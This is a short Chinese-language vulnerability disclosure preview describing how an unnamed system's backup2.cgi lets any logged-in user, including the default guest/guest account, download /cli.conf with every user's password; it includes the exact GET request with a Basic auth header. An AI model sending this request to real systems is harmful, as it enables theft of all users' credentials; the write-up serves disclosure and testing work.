某系统存在任意账户凭据窃取漏洞

文章预览

世人都晓神仙好，惟有功名忘不了！古今将相今何在？荒冢一堆草没了。 漏洞描述 某系统存在任意账户凭据窃取漏洞，攻击者使用任意账号登录后访问特殊的Url即可获取所有用户的账号和密码 漏洞复现 登录后台(存在访客用户默认账号密码 guest/guest) 漏洞存在于 backup2.cgi 文件中，运行后将会读取 /cli.conf 配置文件 访问漏洞url： http://x.x.x/backup2.cgi           请求包如下 GET /backup2.cgi HTTP/1.1 Host: x.x.x Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= 漏洞证明，其中配置文件中是含有所有用户密码以及敏感配置信息的 漏洞验证poc： 漏洞证明： 文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。 免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责， 文章作者不为此承担任何责任。 转载声明：儒道易 ………………………………